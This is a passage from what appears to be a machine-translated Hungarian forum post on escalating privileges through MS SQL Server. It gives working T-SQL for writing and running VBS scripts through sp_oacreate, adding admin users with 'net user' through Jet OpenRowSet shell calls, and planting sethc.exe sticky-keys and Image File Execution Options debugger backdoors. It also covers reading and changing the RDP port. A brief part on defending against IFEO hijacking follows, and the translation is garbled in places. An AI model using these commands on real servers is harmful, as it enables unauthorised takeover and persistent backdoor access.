gyökérkönyvtára tiltja az írást) Ezután cmd végrehajtja a ftp -s:c:\1.bat Miután ezt végrehajtotta, letölt egy nem hálózati ekalációs szkriptet a CFT meghajtó FTP-re, vagy közvetlenül ír egy VBS ekalációs szkriptet. declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create('user')' exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "password","' exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3' Ezután a cmd futtatja a cscrip-et, hogy eltávolítsa a t c:\1.vbs 4. Az előzőt megjavítják, hogy cmd parancsokat hajtson végre, de néhány javítás után új problémák jelennek meg (1) Üzenet: Hiba történt a xp_cmdshell végrehajtása során. A 'CreateProcess' hívás hibakóddal sikerült: '5'. Az 5-ös hiba a rendszer által javasolt hibaszám, a CreateProcess pedig a szál létrehozásának jelentése, ez a hibagenerálás nagyban függ a rendszerfájlok cmd.exe között: az egyik az, hogy a cmd törlik, a másik az, hogy a cmd jogosultsága csökken. SQL a terminálportok és a nyílt státusz ellenőrzéséhez: Végrehajtó mester.. xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber' Rendben, az alábbi kulcspont, hogy két SQL utasítással másoljuk a rendszer Explorer fájlját a rendszer shift backdoor fájljába, és a következő két utasítást külön hajtsuk végre. Ez a nyilatkozat explorer.exe úgy másolja sethc.exe deklaráld @o int exec sp_oacreate 'scripremove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe'; Ez az utasítás sethc.exe másolatot ad a dllcache könyvtárba deklaráld @oo int exec sp_oacreate 'scrip remove ting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\ sethc.exe'; A másik két állítás sp_oacreate tárolt eljárást használ, amelyeknek odsole70.dll fájlt kell használniuk, így a fájl túlélése a létrehozás sikerével függ. (2), xpsql.cpp: 5-es hiba a CreateProcess-ből (737-es sor) Ez a helyzet bonyolultabb, és ezt az interneten is mondják EXECUTIVE master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")'); Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")'); Megnéztem a homokbozót, hogy felemeljem a jogokat ebben az ügyben, de a gyakorlatom alapján ez a sikerességi arány nagyon alacsony, mert a legtöbb szerver törölte a c:\windows\system32\ias\ias.mdb mappát. Ezután megpróbálhatod a képeltérítést a SETHC-vel, természetesen a képeltérítés is feltételes, az 1. létezés xp_regwrite ez a tárolt eljárás 2: 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',' Hibakereső nem törlődik Először megkérdezheted, hogy a regisztrációs ragasztott kulcsot eltérítették-e Végrehajtó mester.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger' Ha a prompt nem találja meg a problémát, a bizonyítást töröljük, és ha kérik, nincs mód sethc.exe végrehajtani a sql parancsot EXECUTIVE mester.. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc. EXE', @value_name='Debugger', @type='REG_SZ', @value='C:\WINDOWS\explorer.exe' Miután ötször csatlakoztam a terminálhoz és váltottam, közvetlenül az asztalra megy, majd manuálisan hozzáadom.
A regiszter módosítja a terminálportot
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp,
A képeltérítés megelőzését elsősorban a következő módszerek segítségével lehet elérni:
★ Engedélykorlátozási törvény
Ha a felhasználónak már nincs hozzáférése a regisztrációs kulcshoz, nem tudja módosítani ezeket a dolgokat. Nyisd meg a Registry Editort, és menj a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows menübe
NT\CurrentVersion\Image File Execution Options, válaszd ki ezt az elemet, jobb kattints – > jogosultságok – > haladóbb szint, és csökkentsd az adminisztrátor és rendszerfelhasználók jogosultságait (itt csak töröld az írási műveletet).
★ Gyors késvágás – rendezetlen kender módszer
Nyisd meg a regiszterszerkesztőt, és menj a sávra
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl futtatási opciók
A probléma megoldható azzal, hogy közvetlenül töröljük a Képfájl Végrehajtási Opciók elemet.
SQL Command eltéríti a regisztrációt ragasztó kulcs telepítésének hátsó ajtója xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc.exe', 'Debugger','REG_SZ','C:\WINDOWS\system32\kdsn.exe'
Szoftverletöltés:Turisták, ha szeretnétek megnézni ennek a bejegyzésnek a rejtett tartalmát, kérlek Válasz
|